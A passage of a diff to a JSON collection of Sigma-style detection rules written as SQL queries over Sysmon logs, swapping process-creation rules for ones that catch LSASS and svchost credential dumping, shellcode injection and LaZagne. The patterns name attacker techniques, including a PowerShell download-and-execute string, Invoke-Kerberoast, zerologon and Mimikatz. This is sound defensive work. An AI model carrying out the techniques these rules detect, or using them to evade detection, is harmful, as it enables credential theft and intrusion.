OR GrantedAccess LIKE '%F0' ESCAPE '\\' OR GrantedAccess LIKE '%18' ESCAPE '\\' OR GrantedAccess LIKE '%38' ESCAPE '\\' OR GrantedAccess LIKE '%58' ESCAPE '\\' OR GrantedAccess LIKE '%78' ESCAPE '\\' OR GrantedAccess LIKE '%98' ESCAPE '\\' OR GrantedAccess LIKE '%B8' ESCAPE '\\' OR GrantedAccess LIKE '%D8' ESCAPE '\\' OR GrantedAccess LIKE '%F8' ESCAPE '\\' OR GrantedAccess LIKE '%1A' ESCAPE '\\' OR GrantedAccess LIKE '%3A' ESCAPE '\\' OR GrantedAccess LIKE '%5A' ESCAPE '\\' OR GrantedAccess LIKE '%7A' ESCAPE '\\' OR GrantedAccess LIKE '%9A' ESCAPE '\\' OR GrantedAccess LIKE '%BA' ESCAPE '\\' OR GrantedAccess LIKE '%DA' ESCAPE '\\' OR GrantedAccess LIKE '%FA' ESCAPE '\\' OR GrantedAccess LIKE '%0x14C2' ESCAPE '\\')) AND NOT (((SourceImage LIKE 'C:\\\\WINDOWS\\\\system32\\\\taskmgr.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Program Files\\\\Malwarebytes\\\\Anti-Malware\\\\MBAMService.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\PROGRAMDATA\\\\MALWAREBYTES\\\\MBAMSERVICE\\\\ctlrupdate\\\\mbupdatr.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\WINDOWS\\\\system32\\\\taskhostw.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Users\\\\%\\\\AppData\\\\Local\\\\Programs\\\\Microsoft VS Code\\\\Code.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Program Files\\\\Windows Defender\\\\MsMpEng.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Windows\\\\SysWOW64\\\\msiexec.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\msiexec.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\lsass.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\WINDOWS\\\\System32\\\\perfmon.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\MRT.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Program Files\\\\Cisco\\\\Cisco AnyConnect Secure Mobility Client\\\\vpnagent.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Program Files (x86)\\\\Cisco\\\\Cisco AnyConnect Secure Mobility Client\\\\vpnagent.exe' ESCAPE '\\')) OR (SourceImage LIKE 'C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\MsMpEng.exe' ESCAPE '\\') OR (CallTrace LIKE '%|C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\Definition Updates\\\\{%' ESCAPE '\\' AND CallTrace LIKE '%}\\\\mpengine.dll+%' ESCAPE '\\' AND GrantedAccess = '0x1418') OR (SourceImage LIKE 'C:\\\\Program Files\\\\Microsoft Security Client\\\\MsMpEng.exe' ESCAPE '\\' AND GrantedAccess = '0x1418') OR (SourceImage LIKE 'C:\\\\ProgramData\\\\VMware\\\\VMware Tools\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\vmtoolsd.exe' ESCAPE '\\') OR ((SourceImage LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\') AND SourceImage LIKE '%Antivirus%' ESCAPE '\\') OR (SourceImage LIKE 'C:\\\\WINDOWS\\\\system32\\\\MRT.exe' ESCAPE '\\' AND GrantedAccess = '0x1418') OR (SourceImage LIKE 'C:\\\\Program Files\\\\Common Files\\\\McAfee\\\\MMSSHost\\\\MMSSHOST.exe' ESCAPE '\\') OR (SourceImage LIKE 'C:\\\\Windows\\\\Temp\\\\asgard2-agent\\\\%' ESCAPE '\\' AND (SourceImage LIKE '%\\\\thor64.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\thor.exe' ESCAPE '\\') AND GrantedAccess = '0x1fffff')))" ], - "filename": "proc_creation_win_tscon_localsystem.yml" + "filename": "proc_access_win_susp_proc_access_lsass.yml" }, { - "title": "DLL Execution Via Register-cimprovider.exe", - "id": "a2910908-e86f-4687-aeba-76a5f996e652", - "status": "test", - "description": "Detects using register-cimprovider.exe to execute arbitrary dll file.", - "author": "Ivan Dyachkov, Yulia Fomina, oscd.community", + "title": "Potential Svchost Memory Access", + "id": "166e9c50-8cd9-44af-815d-d1f0c0e90dde", + "status": "experimental", + "description": "Detects potential access to svchost process memory such as that used by Invoke-Phantom to kill the winRM windows event logging service.", + "author": "Tim Burrell", "tags": [ "attack.defense_evasion", - "attack.t1574" + "attack.t1562.002" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\register-cimprovider.exe' ESCAPE '\\' AND CommandLine LIKE '%-path%' ESCAPE '\\' AND CommandLine LIKE '%dll%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '10' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetImage LIKE '%\\\\WINDOWS\\\\System32\\\\svchost.exe' ESCAPE '\\' AND GrantedAccess = '0x1F3FFF' AND CallTrace LIKE '%UNKNOWN%' ESCAPE '\\') AND NOT ((SourceImage LIKE 'C:\\\\Program Files\\\\Microsoft Visual Studio\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\MSBuild\\\\Current\\\\Bin\\\\MSBuild.exe' ESCAPE '\\' AND (CallTrace LIKE '%Microsoft.Build.ni.dll%' ESCAPE '\\' OR CallTrace LIKE '%System.ni.dll%' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_registry_cimprovider_dll_load.yml" + "filename": "proc_access_win_invoke_phantom.yml" }, { - "title": "Download Arbitrary Files Via MSOHTMED.EXE", - "id": "459f2f98-397b-4a4a-9f47-6a5ec2f1c69d", + "title": "LSASS Memory Dump", + "id": "5ef9853e-4d0e-4a70-846f-a9ca37d876da", "status": "experimental", - "description": "Detects usage of \"MSOHTMED\" to download arbitrary files", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects process LSASS memory dump using Mimikatz, NanoDump, Invoke-Mimikatz, Procdump or Taskmgr based on the CallTrace pointing to ntdll.dll, dbghelp.dll or dbgcore.dll for win10, server2016 and up.", + "author": "Samir Bousseaden, Michael Haag", "tags": [ - "attack.defense_evasion", - "attack.execution", - "attack.t1218" + "attack.credential_access", + "attack.t1003.001", + "attack.s0002" ], "falsepositives": [ - "Unknown" + "False positives are present when looking for 0x1410. Exclusions may be required." ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\MSOHTMED.exe' ESCAPE '\\' OR OriginalFileName = 'MsoHtmEd.exe') AND (CommandLine LIKE '%http://%' ESCAPE '\\' OR CommandLine LIKE '%https://%' ESCAPE '\\' OR CommandLine LIKE '%ftp://%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '10' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\' AND (GrantedAccess LIKE '%0x1038%' ESCAPE '\\' OR GrantedAccess LIKE '%0x1438%' ESCAPE '\\' OR GrantedAccess LIKE '%0x143a%' ESCAPE '\\') AND (CallTrace LIKE '%dbghelp.dll%' ESCAPE '\\' OR CallTrace LIKE '%dbgcore.dll%' ESCAPE '\\' OR CallTrace LIKE '%ntdll.dll%' ESCAPE '\\')) AND NOT ((CallTrace LIKE '%|C:\\\\Windows\\\\Temp\\\\asgard2-agent\\\\%' ESCAPE '\\' AND CallTrace LIKE '%\\\\thor\\\\thor64.exe+%' ESCAPE '\\' AND CallTrace LIKE '%|UNKNOWN(%' ESCAPE '\\' AND GrantedAccess = '0x103800') OR (SourceImage LIKE 'C:\\\\Windows\\\\Sysmon64.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_lolbin_msohtmed_download.yml" + "filename": "proc_access_win_lsass_memdump.yml" }, { - "title": "Operator Bloopers Cobalt Strike Modules", - "id": "4f154fb6-27d1-4813-a759-78b93e0b9c48", - "status": "experimental", - "description": "Detects Cobalt Strike module/commands accidentally entered in CMD shell", - "author": "_pete_0, TheDFIRReport", + "title": "CMSTP Execution Process Access", + "id": "3b4b232a-af90-427c-a22f-30b0c0837b95", + "status": "stable", + "description": "Detects various indicators of Microsoft Connection Manager Profile Installer execution", + "author": "Nik Seetharaman", "tags": [ + "attack.defense_evasion", + "attack.t1218.003", "attack.execution", - "attack.t1059.003" + "attack.t1559.001", + "attack.g0069", + "attack.g0080", + "car.2019-04-001" ], "falsepositives": [ - "Unknown" + "Legitimate CMSTP use (unlikely in modern enterprise environments)" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (OriginalFileName = 'Cmd.Exe' OR Image LIKE '%\\\\cmd.exe' ESCAPE '\\') AND (CommandLine LIKE '%Invoke-UserHunter%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-ShareFinder%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Kerberoast%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-SMBAutoBrute%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Nightmare%' ESCAPE '\\' OR CommandLine LIKE '%zerologon%' ESCAPE '\\' OR CommandLine LIKE '%av\\_query%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '10' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CallTrace LIKE '%cmlua.dll%' ESCAPE '\\')" ], - "filename": "proc_creation_win_hktl_cobaltstrike_bloopers_modules.yml" + "filename": "proc_access_win_cmstp_execution_by_access.yml" }, { - "title": "Renamed Plink Execution", - "id": "1c12727d-02bf-45ff-a9f3-d49806a3cf43", - "status": "experimental", - "description": "Detects the execution of a renamed version of the Plink binary", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "SVCHOST Credential Dump", + "id": "174afcfa-6e40-4ae9-af64-496546389294", + "status": "test", + "description": "Detects when a process, such as mimikatz, accesses the memory of svchost to dump credentials", + "author": "Florent Labouyrie", "tags": [ - "attack.defense_evasion", - "attack.t1036" + "attack.t1548" ], "falsepositives": [ - "Unknown" + "Non identified legit exectubale" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (OriginalFileName = 'Plink' OR (CommandLine LIKE '% -l forward%' ESCAPE '\\' AND CommandLine LIKE '% -P %' ESCAPE '\\' AND CommandLine LIKE '% -R %' ESCAPE '\\')) AND NOT (Image LIKE '%\\\\plink.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '10' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetImage LIKE '%\\\\svchost.exe' ESCAPE '\\' AND GrantedAccess = '0x143a') AND NOT ((SourceImage LIKE '%\\\\services.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\msiexec.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_renamed_plink.yml" + "filename": "proc_access_win_svchost_cred_dump.yml" }, { - "title": "Suspicious PowerShell Download and Execute Pattern", - "id": "e6c54d94-498c-4562-a37c-b469d8e9a275", - "status": "experimental", - "description": "Detects suspicious PowerShell download patterns that are often used in malicious scripts, stagers or downloaders (make sure that your backend applies the strings case-insensitive)", - "author": "Florian Roth (Nextron Systems)", + "title": "Credential Dumping by LaZagne", + "id": "4b9a8556-99c4-470b-a40c-9c8d02c77ed0", + "status": "stable", + "description": "Detects LSASS process access by LaZagne for credential dumping.", + "author": "Bhabesh Raj, Jonhnathan Ribeiro", "tags": [ - "attack.execution", - "attack.t1059.001" + "attack.credential_access", + "attack.t1003.001", + "attack.s0349" ], "falsepositives": [ - "Software installers that pull packages from remote systems and execute them" + "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%IEX ((New-Object Net.WebClient).DownloadString%' ESCAPE '\\' OR CommandLine LIKE '%IEX (New-Object Net.WebClient).DownloadString%' ESCAPE '\\' OR CommandLine LIKE '%IEX((New-Object Net.WebClient).DownloadString%' ESCAPE '\\' OR CommandLine LIKE '%IEX(New-Object Net.WebClient).DownloadString%' ESCAPE '\\' OR CommandLine LIKE '% -command (New-Object System.Net.WebClient).DownloadFile(%' ESCAPE '\\' OR CommandLine LIKE '% -c (New-Object System.Net.WebClient).DownloadFile(%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '10' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\' AND CallTrace LIKE '%C:\\\\Windows\\\\SYSTEM32\\\\ntdll.dll+%' ESCAPE '\\' AND CallTrace LIKE '%|C:\\\\Windows\\\\System32\\\\KERNELBASE.dll+%' ESCAPE '\\' AND CallTrace LIKE '%\\_ctypes.pyd+%' ESCAPE '\\' AND CallTrace LIKE '%python27.dll+%' ESCAPE '\\' AND GrantedAccess = '0x1FFFFF')" ], - "filename": "proc_creation_win_powershell_susp_download_patterns.yml" + "filename": "proc_access_win_lazagne_cred_dump_lsass_access.yml" }, { - "title": "Potential CVE-2021-41379 Exploitation Attempt", - "id": "af8bbce4-f751-46b4-8d91-82a33a736f61", - "status": "test", - "description": "Detects potential exploitation attempts of CVE-2021-41379 (InstallerFileTakeOver), a local privilege escalation (LPE) vulnerability where the attacker spawns a \"cmd.exe\" process as a child of Microsoft Edge elevation service \"elevation_service\" with \"LOCAL_SYSTEM\" rights", - "author": "Florian Roth (Nextron Systems)", + "title": "Potential Shellcode Injection", + "id": "250ae82f-736e-4844-a68b-0b5e8cc887da", + "status": "experimental", + "description": "Detects potential shellcode injection used by tools such as Metasploit's migrate and Empire's psinject", + "author": "Bhabesh Raj", "tags": [ + "attack.defense_evasion", "attack.privilege_escalation", - "attack.t1068" + "attack.t1055" ], "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('Cmd.Exe', 'PowerShell.EXE', 'pwsh.dll')) AND (ParentImage LIKE '%\\\\elevation\\_service.exe' ESCAPE '\\' AND IntegrityLevel = 'System'))" + "SELECT * FROM logs WHERE ((EventID = '10' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (GrantedAccess IN ('0x147a', '0x1f3fff') AND CallTrace LIKE '%UNKNOWN%' ESCAPE '\\') AND NOT (((SourceImage LIKE 'C:\\\\Program Files\\\\Dell\\\\%' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Program Files (x86)\\\\Dell\\\\%' ESCAPE '\\') AND (TargetImage LIKE 'C:\\\\Program Files\\\\Dell\\\\%' ESCAPE '\\' OR TargetImage LIKE 'C:\\\\Program Files (x86)\\\\Dell\\\\%' ESCAPE '\\') AND GrantedAccess = '0x1F3FFF' AND CallTrace LIKE 'C:\\\\Windows\\\\System32\\\\ntdll.dll%' ESCAPE '\\') OR (SourceImage LIKE 'C:\\\\Program Files (x86)\\\\Dell\\\\UpdateService\\\\ServiceShell.exe' ESCAPE '\\' AND TargetImage LIKE 'C:\\\\Windows\\\\Explorer.EXE' ESCAPE '\\' AND GrantedAccess = '0x1F3FFF' AND CallTrace LIKE 'C:\\\\Windows\\\\System32\\\\ntdll.dll%' ESCAPE '\\') OR ((SourceImage LIKE 'C:\\\\Program Files\\\\Microsoft Visual Studio\\\\2022\\\\Community\\\\Common7\\\\IDE\\\\PerfWatson2.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Program Files (x86)\\\\Microsoft Visual Studio\\\\2019\\\\Community\\\\Common7\\\\IDE\\\\PerfWatson2.exe' ESCAPE '\\') AND (TargetImage LIKE 'C:\\\\Program Files\\\\Microsoft Visual Studio\\\\2022\\\\Community\\\\Common7\\\\IDE\\\\devenv.exe' ESCAPE '\\' OR TargetImage LIKE 'C:\\\\Program Files (x86)\\\\Microsoft Visual Studio\\\\2019\\\\Community\\\\Common7\\\\IDE\\\\devenv.exe' ESCAPE '\\') AND CallTrace LIKE 'C:\\\\Windows\\\\System32\\\\ntdll.dll%' ESCAPE '\\') OR (SourceImage LIKE 'C:\\\\Program Files\\\\Microsoft Visual Studio\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\MSBuild\\\\Current\\\\Bin\\\\MSBuild.exe' ESCAPE '\\' AND TargetImage LIKE 'C:\\\\Program Files\\\\Dell\\\\DellDataVault\\\\DDVDataCollector.exe' ESCAPE '\\') OR (SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\Wbem\\\\Wmiprvse.exe' ESCAPE '\\' AND TargetImage LIKE 'C:\\\\Windows\\\\system32\\\\lsass.exe' ESCAPE '\\' AND CallTrace LIKE 'C:\\\\Windows\\\\SYSTEM32\\\\ntdll.dll%' ESCAPE '\\' AND CallTrace LIKE '%\\\\System.ni.dll+%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_exploit_cve_2021_41379.yml" + "filename": "proc_access_win_shellcode_inject_msf_empire.yml" }, { - "title": "Suspicious Driver Install by pnputil.exe", - "id": "a2ea3ae7-d3d0-40a0-a55c-25a45c87cac1", - "status": "test", - "description": "Detects when a possible suspicious driver is being installed via pnputil.exe lolbin", - "author": "Hai Vaknin @LuxNoBulIshit, Avihay eldad @aloneliassaf, Austin Songer @austinsonger", + "title": "LSASS Access from Program in Suspicious Folder", + "id": "fa34b441-961a-42fa-a100-ecc28c886725", + "status": "experimental", + "description": "Detects process access to LSASS memory with suspicious access flags and from a suspicious folder", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1547" + "attack.credential_access", + "attack.t1003.001", + "attack.s0002" ], "falsepositives": [ - "Pnputil.exe being used may be performed by a system administrator.", - "Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", - "Pnputil.exe being executed from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." + "Updaters and installers are typical false positives. Apply custom filters depending on your environment" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%-i%' ESCAPE '\\' OR CommandLine LIKE '%/install%' ESCAPE '\\' OR CommandLine LIKE '%-a%' ESCAPE '\\' OR CommandLine LIKE '%/add-driver%' ESCAPE '\\' OR CommandLine LIKE '%.inf%' ESCAPE '\\') AND Image LIKE '%\\\\pnputil.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '10' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\' AND (GrantedAccess LIKE '%10' ESCAPE '\\' OR GrantedAccess LIKE '%30' ESCAPE '\\' OR GrantedAccess LIKE '%50' ESCAPE '\\' OR GrantedAccess LIKE '%70' ESCAPE '\\' OR GrantedAccess LIKE '%90' ESCAPE '\\' OR GrantedAccess LIKE '%B0' ESCAPE '\\' OR GrantedAccess LIKE '%D0' ESCAPE '\\' OR GrantedAccess LIKE '%F0' ESCAPE '\\' OR GrantedAccess LIKE '%18' ESCAPE '\\' OR GrantedAccess LIKE '%38' ESCAPE '\\' OR GrantedAccess LIKE '%58' ESCAPE '\\' OR GrantedAccess LIKE '%78' ESCAPE '\\' OR GrantedAccess LIKE '%98' ESCAPE '\\' OR GrantedAccess LIKE '%B8' ESCAPE '\\' OR GrantedAccess LIKE '%D8' ESCAPE '\\' OR GrantedAccess LIKE '%F8' ESCAPE '\\' OR GrantedAccess LIKE '%1A' ESCAPE '\\' OR GrantedAccess LIKE '%3A' ESCAPE '\\' OR GrantedAccess LIKE '%5A' ESCAPE '\\' OR GrantedAccess LIKE '%7A' ESCAPE '\\' OR GrantedAccess LIKE '%9A' ESCAPE '\\' OR GrantedAccess LIKE '%BA' ESCAPE '\\' OR GrantedAccess LIKE '%DA' ESCAPE '\\' OR GrantedAccess LIKE '%FA' ESCAPE '\\' OR GrantedAccess LIKE '%0x14C2' ESCAPE '\\' OR GrantedAccess LIKE '%FF' ESCAPE '\\') AND (SourceImage LIKE '%\\\\Temp\\\\%' ESCAPE '\\' OR SourceImage LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR SourceImage LIKE '%\\\\PerfLogs\\\\%' ESCAPE '\\' OR SourceImage LIKE '%\\\\AppData\\\\%' ESCAPE '\\' OR SourceImage LIKE '%\\\\Temporary%' ESCAPE '\\')) AND NOT ((SourceImage LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\AppData\\\\Local\\\\%' ESCAPE '\\' AND (SourceImage LIKE '%\\\\Microsoft VS Code\\\\Code.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\software\\_reporter\\_tool.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\DropboxUpdate.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\MBAMInstallerService.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\WebexMTA.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\WebEx\\\\WebexHost.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\JetBrains\\\\Toolbox\\\\bin\\\\jetbrains-toolbox.exe' ESCAPE '\\') AND GrantedAccess = '0x410') OR (SourceImage LIKE 'C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' AND SourceImage LIKE '%.tmp\\\\DropboxUpdate.exe' ESCAPE '\\' AND GrantedAccess IN ('0x410', '0x1410')) OR (SourceImage LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' AND SourceImage LIKE '%.tmp\\\\DropboxUpdate.exe' ESCAPE '\\' AND GrantedAccess = '0x1410') OR ((SourceImage LIKE 'C:\\\\Windows\\\\Temp\\\\asgard2-agent\\\\%' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Windows\\\\Temp\\\\asgard2-agent-sc\\\\%' ESCAPE '\\') AND (SourceImage LIKE '%\\\\thor64.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\thor.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\aurora-agent-64.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\aurora-agent.exe' ESCAPE '\\') AND GrantedAccess IN ('0x1fffff', '0x1010', '0x101010')) OR (SourceImage LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\vs\\_bootstrapper\\_%' ESCAPE '\\' AND GrantedAccess = '0x1410') OR (SourceImage LIKE 'C:\\\\Program Files (x86)\\\\Google\\\\Temp\\\\%' ESCAPE '\\' AND SourceImage LIKE '%.tmp\\\\GoogleUpdate.exe' ESCAPE '\\' AND GrantedAccess IN ('0x410', '0x1410')) OR (SourceImage LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\AppData\\\\Local\\\\Keybase\\\\keybase.exe' ESCAPE '\\' AND GrantedAccess = '0x1fffff') OR (SourceImage LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\is-%' ESCAPE '\\' AND SourceImage LIKE '%.tmp\\\\avira\\_system\\_speedup.tmp' ESCAPE '\\' AND GrantedAccess = '0x1410') OR (SourceImage LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\AppData\\\\Roaming\\\\ViberPC\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\updater.exe' ESCAPE '\\' AND TargetImage LIKE '%\\\\winlogon.exe' ESCAPE '\\' AND GrantedAccess = '0x1fffff') OR ((SourceImage LIKE 'C:\\\\Program Files\\\\Common Files\\\\Adobe\\\\ARM\\\\%' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Program Files (x86)\\\\Common Files\\\\Adobe\\\\ARM\\\\%' ESCAPE '\\') AND SourceImage LIKE '%\\\\AdobeARMHelper.exe' ESCAPE '\\' AND GrantedAccess = '0x1410')))" ], - "filename": "proc_creation_win_lolbin_susp_driver_installed_by_pnputil.yml" + "filename": "proc_access_win_susp_proc_access_lsass_susp_source.yml" }, { - "title": "Wscript Shell Run In CommandLine", - "id": "2c28c248-7f50-417a-9186-a85b223010ee", + "title": "Credential Dumping Tools Accessing LSASS Memory", + "id": "32d0d3e2-e58d-4d41-926b-18b520b2b32d", "status": "experimental", - "description": "Detects the presence of the keywords \"Wscript\", \"Shell\" and \"Run\" in the command, which could indicate a suspicious activity", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects processes requesting access to LSASS memory via suspicious access masks. This is typical for credentials dumping tools", + "author": "Florian Roth, Roberto Rodriguez, Dimitrios Slamaris, Mark Russinovich, Thomas Patzke, Teymur Kheirkhabarov, Sherif Eldeeb, James Dickenson, Aleksey Potapov, oscd.community", "tags": [ - "attack.execution", - "attack.t1059" + "attack.credential_access", + "attack.t1003.001", + "attack.s0002", + "car.2019-04-004" ], "falsepositives": [ - "Rare legitimate inline scripting by some administrators" + "Likely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%Wscript.%' ESCAPE '\\' AND CommandLine LIKE '%.Shell%' ESCAPE '\\' AND CommandLine LIKE '%.Run%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '10' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\' AND (GrantedAccess LIKE '0x40%' ESCAPE '\\' OR GrantedAccess LIKE '0x100000%' ESCAPE '\\' OR GrantedAccess LIKE '0x1410%' ESCAPE '\\' OR GrantedAccess LIKE '0x1438%' ESCAPE '\\' OR GrantedAccess LIKE '0x143a%' ESCAPE '\\' OR GrantedAccess LIKE '0x1418%' ESCAPE '\\' OR GrantedAccess LIKE '0x1f0fff%' ESCAPE '\\' OR GrantedAccess LIKE '0x1f1fff%' ESCAPE '\\' OR GrantedAccess LIKE '0x1f2fff%' ESCAPE '\\' OR GrantedAccess LIKE '0x1f3fff%' ESCAPE '\\')) AND NOT (((SourceImage LIKE 'C:\\\\WINDOWS\\\\system32\\\\taskmgr.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\perfmon.exe' ESCAPE '\\')) OR ((SourceImage LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\') AND GrantedAccess IN ('0x1410', '0x410')) OR ((SourceImage LIKE 'C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\%' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Program Files\\\\Windows Defender\\\\%' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Program Files\\\\Microsoft Security Client\\\\MsMpEng.exe%' ESCAPE '\\') AND SourceImage LIKE '%\\\\MsMpEng.exe' ESCAPE '\\') OR (SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\svchost.exe' ESCAPE '\\' AND CallTrace LIKE '%|C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\Definition Updates\\\\{%' ESCAPE '\\' AND CallTrace LIKE '%}\\\\mpengine.dll+%' ESCAPE '\\' AND GrantedAccess = '0x1418') OR ((CallTrace LIKE '%|c:\\\\program files\\\\windows defender\\\\mprtp.dll%' ESCAPE '\\' OR CallTrace LIKE '%|c:\\\\program files\\\\windows defender\\\\MpClient.dll%' ESCAPE '\\')) OR (SourceImage LIKE 'C:\\\\Program Files\\\\WindowsApps\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\GamingServices.exe' ESCAPE '\\' AND GrantedAccess IN ('0x1410', '0x410')) OR ((SourceImage LIKE '%\\\\PROCEXP64.EXE' ESCAPE '\\' OR SourceImage LIKE '%\\\\PROCEXP.EXE' ESCAPE '\\' OR SourceImage LIKE '%C:\\\\WINDOWS\\\\system32\\\\taskhostw.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\MBAMInstallerService.exe' ESCAPE '\\') AND GrantedAccess IN ('0x1410', '0x410', '0x40')) OR ((SourceImage LIKE 'C:\\\\WINDOWS\\\\system32\\\\wbem\\\\wmiprvse.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Windows\\\\syswow64\\\\MsiExec.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\msiexec.exe' ESCAPE '\\') AND GrantedAccess IN ('0x1410', '0x410', '0x1f1fff', '0x1f3fff')) OR ((SourceImage LIKE 'C:\\\\Windows\\\\system32\\\\wininit.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\lsass.exe' ESCAPE '\\') AND GrantedAccess = '0x1000000') OR (SourceImage LIKE 